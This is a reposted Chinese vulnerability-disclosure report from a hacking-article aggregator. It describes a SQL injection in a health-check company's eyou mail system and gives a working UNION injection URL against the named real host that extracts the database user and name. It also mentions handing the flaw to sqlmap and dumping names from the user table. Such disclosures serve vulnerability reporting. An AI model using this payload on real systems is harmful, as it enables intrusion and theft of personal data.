记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

爱康国宾某内部重要系统SQL注射(可Union)

2014-10-13 00:00

邮件系统绝对是最重要的系统之一了,可以渗透入企业内部,进行更大危害的操作。

所以学习下猪猪侠,浅尝辄止,呵呵!

邮件系统采用了eyou mail 5,漏洞少了很多,但是依旧存在一处SQL注入。

http://mail.ikang.com/user/?q=help&type=search&page=1&kw=-1") UNION ALL SELECT 1,2,3,concat(user(),0x7c,database()),5,6,7%23

QQ20140828-1@2x.png





漏洞证明:

下面的操作就可以直接丢SQLMAP了

尝试dump了下用户表里面的姓名,没有dump密码,由于延时盲注,肚子很饿,就不继续了,这里截图给厂商确认下危害大小,

QQ20140828-4@2x.png

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2014-074260

阅读:275626 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“爱康国宾某内部重要系统SQL注射(可Union)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁